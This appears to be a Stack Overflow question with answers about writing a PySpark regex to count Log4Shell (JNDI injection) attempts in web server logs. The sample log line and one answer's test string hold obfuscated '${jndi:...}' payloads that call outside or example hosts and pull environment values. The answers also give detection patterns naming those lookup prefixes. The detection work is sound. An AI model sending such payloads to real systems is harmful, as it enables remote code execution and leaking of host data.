# What is the best practice to apply regex on column to detect log4j casese over logs in pyspark dataframe?

Tags: python, regex, pyspark, log4j, databricks

I'm experimenting to filter some events that contains [log4j](https://research.splunk.com/web/log4shell_jndi_payload_injection_attempt/) pattern (`${jndi:XXXXXXXX...XXX}`) as explain in this [post](https://stackoverflow.com/questions/70358072/how-many-log4j2-jndi-lookup-pattern-can-be). I tried to filter my pyspark datafarme `sdf` based on this [regex](https://regex101.com/r/le24r2/1) inspired from this [answer](https://stackoverflow.com/a/70624021/10452700) unsuccessfully. Let's say i just want to count those logs contains this type of [attack vector](https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/). The used regex extract in Regex101 but doesn't work in Databricks within dataframe.
The following is an example:

```
[24/Mar/2022:10:44:23 +0000] 788.268.113.120 "-" "GET /websso/SAML2/SSO/vsphere.local HTTP/1.1" 403 "-b" 0b 2ms "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" 758.133.55.55 42109 "${jndi:${lower:d}n${lower:s}://${env:hostName}.c8u33s1ij2m0lduqp6v0ce6rzbay86hrk.oast.me}" "${jndi:${lower:d}n${lower:s}://${env:hostName}.c8u33s1ij2m0lduqp6v0ce6rzbay86hrk.oast.me}" - - TLSv1.2 -,-,-
```

My code is:

```py
sdf = spark.read.format("delta").load(INPUT_PATH).filter(f"date >='{DATE_FROM}' AND date <='{DATE_TO}'")\
                                                 .filter(f"response_code =='403'")\
                                                 .filter(f"http_method =='GET'")\
                                                 .filter(F.col("raw").rlike("([\$]|[\%24]){1,3}(?<suspicious_log4j>([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)"))\
                                                 .replace(float('nan'), None)
#display(sdf)
sdf.count()
```

I get following error:

```
java.util.regex.PatternSyntaxException: named capturing group is missing trailing &#39;&gt;&#39; near index 31
---------------------------------------------------------------------------
Py4JJavaError                             Traceback (most recent call last)
<command-2117761329875990> in <module>
      5                                                  .replace(float('nan'), None)
      6 #display(sdf)
----> 7 sdf.count()

/databricks/spark/python/pyspark/sql/dataframe.py in count(self)
    686         2
    687         """
--> 688         return int(self._jdf.count())
    689 
    690     def collect(self):

/databricks/spark/python/lib/py4j-0.10.9.1-src.zip/py4j/java_gateway.py in __call__(self, *args)
   1302 
   1303         answer = self.gateway_client.send_command(command)
-> 1304         return_value = get_return_value(
   1305             answer, self.gateway_client, self.target_id, self.name)
   1306 

/databricks/spark/python/pyspark/sql/utils.py in deco(*a, **kw)
    115     def deco(*a, **kw):
    116         try:
--> 117             return f(*a, **kw)
    118         except py4j.protocol.Py4JJavaError as e:
    119             converted = convert_exception(e.java_exception)

/databricks/spark/python/lib/py4j-0.10.9.1-src.zip/py4j/protocol.py in get_return_value(answer, gateway_client, target_id, name)
    324             value = OUTPUT_CONVERTER[type](answer[2:], gateway_client)
    325             if answer[1] == REFERENCE_TYPE:
--> 326                 raise Py4JJavaError(
    327                     "An error occurred while calling {0}{1}{2}.\n".
    328                     format(target_id, ".", name), value)

Py4JJavaError: An error occurred while calling o2028.count.
: java.util.regex.PatternSyntaxException: named capturing group is missing trailing '>' near index 31
([\$]|[\%24]){1,3}(?<suspicious_log4j>([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)
                               ^
    at java.util.regex.Pattern.error(Pattern.java:1969)
    at java.util.regex.Pattern.groupname(Pattern.java:2813)
    at java.util.regex.Pattern.group0(Pattern.java:2858)
    at java.util.regex.Pattern.sequence(Pattern.java:2065)
    at java.util.regex.Pattern.expr(Pattern.java:2010)
    at java.util.regex.Pattern.compile(Pattern.java:1702)
    at java.util.regex.Pattern.<init>(Pattern.java:1352)
    at java.util.regex.Pattern.compile(Pattern.java:1028)
    at com.databricks.sql.expressions.codegen.EdgeExpressionCodegen$.doGenCode(EdgeExpressionCodegen.scala:1005)
    at com.databricks.sql.expressions.codegen.EdgeExpressionCodegen$.genCode(EdgeExpressionCodegen.scala:145)
    at com.databricks.sql.expressions.codegen.EdgeExpressionCodegen$.$anonfun$genCodeWithFallback$1(EdgeExpressionCodegen.scala:264)
    at scala.Option.getOrElse(Option.scala:189)
    at com.databricks.sql.expressions.codegen.EdgeExpressionCodegen$.genCodeWithFallback(EdgeExpressionCodegen.scala:264)
    at org.apache.spark.sql.catalyst.expressions.codegen.CodegenContext.generateExpression(CodeGenerator.scala:1441)
    at org.apache.spark.sql.execution.FilterExec.genPredicate$2(basicPhysicalOperators.scala:269)
    at org.apache.spark.sql.execution.FilterExec.$anonfun$doConsume$4(basicPhysicalOperators.scala:319)
    at scala.collection.TraversableLike.$anonfun$map$1(TraversableLike.scala:286)
    at scala.collection.mutable.ResizableArray.foreach(ResizableArray.scala:62)
    at scala.collection.mutable.ResizableArray.foreach$(ResizableArray.scala:55)
    at scala.collection.mutable.ArrayBuffer.foreach(ArrayBuffer.scala:49)
    at scala.collection.TraversableLike.map(TraversableLike.scala:286)
    at scala.collection.TraversableLike.map$(TraversableLike.scala:279)
    at scala.collection.AbstractTraversable.map(Traversable.scala:108)
    at org.apache.spark.sql.execution.FilterExec.doConsume(basicPhysicalOperators.scala:294)
    at org.apache.spark.sql.execution.CodegenSupport.consume(WholeStageCodegenExec.scala:197)
    at org.apache.spark.sql.execution.CodegenSupport.consume$(WholeStageCodegenExec.scala:152)
    at org.apache.spark.sql.execution.ColumnarToRowExec.consume(Columnar.scala:70)
    at org.apache.spark.sql.execution.ColumnarToRowExec.doProduce(Columnar.scala:196)
    at org.apache.spark.sql.execution.CodegenSupport.$anonfun$produce$1(WholeStageCodegenExec.scala:98)
    at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
    at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
    at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
    at org.apache.spark.sql.execution.CodegenSupport.produce(WholeStageCodegenExec.scala:93)
    at org.apache.spark.sql.execution.CodegenSupport.produce$(WholeStageCodegenExec.scala:93)
    at org.apache.spark.sql.execution.ColumnarToRowExec.produce(Columnar.scala:70)
    at org.apache.spark.sql.execution.FilterExec.doProduce(basicPhysicalOperators.scala:255)
    at org.apache.spark.sql.execution.CodegenSupport.$anonfun$produce$1(WholeStageCodegenExec.scala:98)
    at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
    at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
    at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
    at org.apache.spark.sql.execution.CodegenSupport.produce(WholeStageCodegenExec.scala:93)
    at org.apache.spark.sql.execution.CodegenSupport.produce$(WholeStageCodegenExec.scala:93)
    at org.apache.spark.sql.execution.FilterExec.produce(basicPhysicalOperators.scala:221)
    at org.apache.spark.sql.execution.ProjectExec.doProduce(basicPhysicalOperators.scala:55)
    at org.apache.spark.sql.execution.CodegenSupport.$anonfun$produce$1(WholeStageCodegenExec.scala:98)
    at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
    at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
    at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
    at org.apache.spark.sql.execution.CodegenSupport.produce(WholeStageCodegenExec.scala:93)
    at org.apache.spark.sql.execution.CodegenSupport.produce$(WholeStageCodegenExec.scala:93)
    at org.apache.spark.sql.execution.ProjectExec.produce(basicPhysicalOperators.scala:45)
    at org.apache.spark.sql.execution.aggregate.AggregateCodegenSupport.doProduceWithoutKeys(AggregateCodegenSupport.scala:361)
    at org.apache.spark.sql.execution.aggregate.AggregateCodegenSupport.doProduce(AggregateCodegenSupport.scala:66)
    at org.apache.spark.sql.execution.aggregate.AggregateCodegenSupport.doProduce$(AggregateCodegenSupport.scala:64)
    at org.apache.spark.sql.execution.aggregate.HashAggregateExec.doProduce(HashAggregateExec.scala:47)
    at org.apache.spark.sql.execution.CodegenSupport.$anonfun$produce$1(WholeStageCodegenExec.scala:98)
    at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
    at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
    at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
    at org.apache.spark.sql.execution.CodegenSupport.produce(WholeStageCodegenExec.scala:93)
    at org.apache.spark.sql.execution.CodegenSupport.produce$(WholeStageCodegenExec.scala:93)
    at org.apache.spark.sql.execution.aggregate.HashAggregateExec.produce(HashAggregateExec.scala:47)
    at org.apache.spark.sql.execution.WholeStageCodegenExec.doCodeGen(WholeStageCodegenExec.scala:659)
    at org.apache.spark.sql.execution.WholeStageCodegenExec.doExecute(WholeStageCodegenExec.scala:722)
    at org.apache.spark.sql.execution.SparkPlan.$anonfun$execute$1(SparkPlan.scala:224)
    at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
    at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
    at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
    at org.apache.spark.sql.execution.SparkPlan.execute(SparkPlan.scala:220)
    at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.inputRDD$lzycompute(ShuffleExchangeExec.scala:152)
    at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.inputRDD(ShuffleExchangeExec.scala:152)
    at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.mapOutputStatisticsFuture$lzycompute(ShuffleExchangeExec.scala:157)
    at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.mapOutputStatisticsFuture(ShuffleExchangeExec.scala:156)
    at org.apache.spark.sql.execution.exchange.ShuffleExchangeLike.$anonfun$submitShuffleJob$1(ShuffleExchangeExec.scala:73)
    at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
    at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
    at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
    at org.apache.spark.sql.execution.exchange.ShuffleExchangeLike.submitShuffleJob(ShuffleExchangeExec.scala:73)
    at org.apache.spark.sql.execution.exchange.ShuffleExchangeLike.submitShuffleJob$(ShuffleExchangeExec.scala:72)
    at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.submitShuffleJob(ShuffleExchangeExec.scala:132)
    at org.apache.spark.sql.execution.adaptive.ShuffleQueryStageExec.shuffleFuture$lzycompute(QueryStageExec.scala:268)
    at org.apache.spark.sql.execution.adaptive.ShuffleQueryStageExec.shuffleFuture(QueryStageExec.scala:268)
    at org.apache.spark.sql.execution.adaptive.ShuffleQueryStageExec.doMaterialize(QueryStageExec.scala:270)
    at org.apache.spark.sql.execution.adaptive.QueryStageExec.materialize(QueryStageExec.scala:123)
    at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.$anonfun$getFinalPhysicalPlan$5(AdaptiveSparkPlanExec.scala:394)
    at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.$anonfun$getFinalPhysicalPlan$5$adapted(AdaptiveSparkPlanExec.scala:392)
    at scala.collection.Iterator.foreach(Iterator.scala:943)
    at scala.collection.Iterator.foreach$(Iterator.scala:943)
    at scala.collection.AbstractIterator.foreach(Iterator.scala:1431)
    at scala.collection.IterableLike.foreach(IterableLike.scala:74)
    at scala.collection.IterableLike.foreach$(IterableLike.scala:73)
    at scala.collection.AbstractIterable.foreach(Iterable.scala:56)
    at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.$anonfun$getFinalPhysicalPlan$1(AdaptiveSparkPlanExec.scala:392)
    at org.apache.spark.sql.SparkSession.withActive(SparkSession.scala:958)
    at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.getFinalPhysicalPlan(AdaptiveSparkPlanExec.scala:364)
    at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.withFinalPlanUpdate(AdaptiveSparkPlanExec.scala:496)
    at org.apache.spark.sql.execution.ResultCacheManager.computeResult(ResultCacheManager.scala:594)
    at org.apache.spark.sql.execution.ResultCacheManager.$anonfun$getOrComputeResultInternal$1(ResultCacheManager.scala:542)
    at scala.Option.getOrElse(Option.scala:189)
    at org.apache.spark.sql.execution.ResultCacheManager.getOrComputeResultInternal(ResultCacheManager.scala:541)
    at org.apache.spark.sql.execution.ResultCacheManager.getOrComputeResult(ResultCacheManager.scala:438)
    at org.apache.spark.sql.execution.ResultCacheManager.getOrComputeResult(ResultCacheManager.scala:417)
    at org.apache.spark.sql.execution.SparkPlan.executeCollectResult(SparkPlan.scala:422)
    at org.apache.spark.sql.execution.SparkPlan.executeCollect(SparkPlan.scala:398)
    at org.apache.spark.sql.Dataset.$anonfun$count$1(Dataset.scala:3160)
    at org.apache.spark.sql.Dataset.$anonfun$count$1$adapted(Dataset.scala:3159)
    at org.apache.spark.sql.Dataset.$anonfun$withAction$1(Dataset.scala:3901)
    at org.apache.spark.sql.execution.SQLExecution$.$anonfun$withCustomExecutionEnv$5(SQLExecution.scala:196)
    at org.apache.spark.sql.execution.SQLExecution$.withSQLConfPropagated(SQLExecution.scala:343)
    at org.apache.spark.sql.execution.SQLExecution$.$anonfun$withCustomExecutionEnv$1(SQLExecution.scala:148)
    at org.apache.spark.sql.SparkSession.withActive(SparkSession.scala:958)
    at org.apache.spark.sql.execution.SQLExecution$.withCustomExecutionEnv(SQLExecution.scala:115)
    at org.apache.spark.sql.execution.SQLExecution$.withNewExecutionId(SQLExecution.scala:293)
    at org.apache.spark.sql.Dataset.withAction(Dataset.scala:3899)
    at org.apache.spark.sql.Dataset.count(Dataset.scala:3159)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:498)
    at py4j.reflection.MethodInvoker.invoke(MethodInvoker.java:244)
    at py4j.reflection.ReflectionEngine.invoke(ReflectionEngine.java:380)
    at py4j.Gateway.invoke(Gateway.java:295)
    at py4j.commands.AbstractCommand.invokeMethod(AbstractCommand.java:132)
    at py4j.commands.CallCommand.execute(CallCommand.java:79)
    at py4j.GatewayConnection.run(GatewayConnection.java:251)
    at java.lang.Thread.run(Thread.java:748)
```

I found some workaround like [here](https://stackoverflow.com/questions/50105487/how-to-apply-multiple-regex-patterns-in-pyspark-dataframe)
Hoping to learn from the regex masters or anyone who has input on this :)

Comment: Mario, i saw your comment before and you provided a regex101 test, i'm not really into log4j, but does this is what you [expect?](https://regex101.com/r/vU0doo/1)

Comment: Is this `${jndi:${lower:d}n${lower:s}` you are looking to extract from the provided log line?

Comment: I don't think `([\$]|[\%24]){1,3}` does what you think it does. Square brackets are a character class, so `[\%24]{1,3}` will match "%%" or "%4", but will not match "%24%24%24". (I'm assuming that percent actually needs to be escaped in Python regex?) Also the single "$" doesn't need to be in a class, and you're not capturing the group so it could simply be `(?:\$|\%24){1,3}`. Same for later %7B and %2F.

Comment: "The used regex extract in Regex101" no it doesn't, if you select Python as your regex language. I don't know enough about Python regex to be confident posting an answer, but aside from the misunderstanding of character classes, the error clearly states where the problem is. From the output at regex101 it seems like Python doesn't support named groups and if you remove that your error will go away.

Comment: And finally, you are lacking in test cases here; why are all these URI escapes in the regex if none of them are present in the test case? Are there other lines you're hoping to catch that you aren't telling us about?

Answer (score 2):

**Proposed regex pattern**

`\"?\$\{(?:jndi|lower|upper|env|sys|java|date|::-j)[^\s]*\"`

**Python code example**

```
import re

def findMatches():
    regex = r"\"?\$\{(?:jndi|lower|upper|env|sys|java|date|::-j)[^\s]*\""

    test_str =  "\"${jndi:dns://example.com/…}\" \   # Includes 7 matches
            \"${jndi:ldap://example.com/${env:USER}\" \
            \"${jndi:rmi://example.com/${env:USER}\" \
           \"${jn${lower:d}i:l${lower:d}ap://example.${lower:c}om/example\" \
            \"${jn${upper:d}i:l${lower:d}ap://example.${lower:c}om/example\" \
            \"${::-j}{::-n}{::-d}{::-i}${date:d}i:l${lower:d}ap://example.${lower:c}om/example\" \
            \"${jndi:${lower:d}n${lower:s}://${env:hostName}.c8u33s1ij2m0lduqp6v0ce6rzbay86hrk.oast.me}\""

    return len(re.findall(regex, test_str, re.MULTILINE | re.IGNORECASE))

if __name__ == "__main__":
    assert findMatches() == 7
```

**Details about the Regex pattern**

- All characters starting with `\` are to be matched literally
- `?` Zero or one of the previous token
- `(?:jndi|lower|upper|env|sys|java|date|::-j)` non capturing group to match each prefix
- `[^\s]*` matches a zero or unlimited tokens not present in the list.
- `\"` must end with `"`

**Notes**

- Make sure to set Regex options to Global, Multiline and Case Insensitive.
- The proposed regex pattern should cover the majority (if not all) of the cases based on the examples shown [here](https://panther.com/blog/panthers-guide-to-log4j-exploitation-prevention-and-detection/#id7).
- The above regex pattern was built under the assumption that:

  - Each command is separated by a space
  - Each command ends with `"`
  - Strings have the following prefix `"${jndi` or include the following:

    - `${lower`
    - `${upper`
    - `${env`
    - `${sys`
    - `${java`
    - `${date`
    - `${::-j`

**Recommendation**

- Next time please be explicit with the question as well as the samples/cases to test.

Comment: Thanks for your input still; it doesn't extract in the example of 25/Mar/2022 & 20/Mar/2022 on [regex101](https://regex101.com/r/RQTR2Q/2).

Comment: Did you notice the list of possible *The exploit string* in this [workaround](https://panther.com/blog/panthers-guide-to-log4j-exploitation-prevention-and-detection/#id7) such as: `“jndi:${`,`“${jndi:`,`${lower:`,`“${date:`,`${::-j”`, `“jndi:ldap:/`, etc. maybe you can update your answer to the list of possible *The exploit string* mentioned in the post.

Comment: @Mario note the changes in the response.

Comment: May I draw your attention to this [post](https://stackoverflow.com/questions/72005312/what-is-the-best-practice-using-kql-to-filter-desired-attack-signature-over-web). Maybe you have an efficient regex solution to detect of Escaping special characters eg. `${XXX}` `!(()&&!|*|*|`  made of  `((`,  `OR` or `$`, `".\"`... in *Example web requests*.

Answer (score 0):

Here's my input :) If you try this regular expression [on regex101](https://regex101.com/r/EzcCFi/1) you see that it works as a PHP or C# regular expression but it is incorrect as a Python or Java regexp (and I assume Pyspark will use some Python or Java regular expression engine).

The part of the regular expression that's causing problems is `(?<suspicious_log4j>` that represents a *named group* is C#. You could just remove it since you're not using this name for the group, like this:

```
"([\$]|[\%24]){1,3}(?<suspicious_log4j>( ... "
```

change to

```
"([\$]|[\%24]){1,3}(( ... "
```

In your example:

```
sdf = df.filter(F.col('state').rlike("([\$]|[\%24]){1,3}(([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)"))
```

and now the regular expression works with Pyspark.

Comment: Thanks for your input. After give some investigation and tried your solution still I couldn't extract `${jndi:XXXXXXXX...XXX}` patterns. Please see this [workaround](https://panther.com/blog/panthers-guide-to-log4j-exploitation-prevention-and-detection/#id7) and check this examples on [regex101](https://regex101.com/r/vhzZvu/1)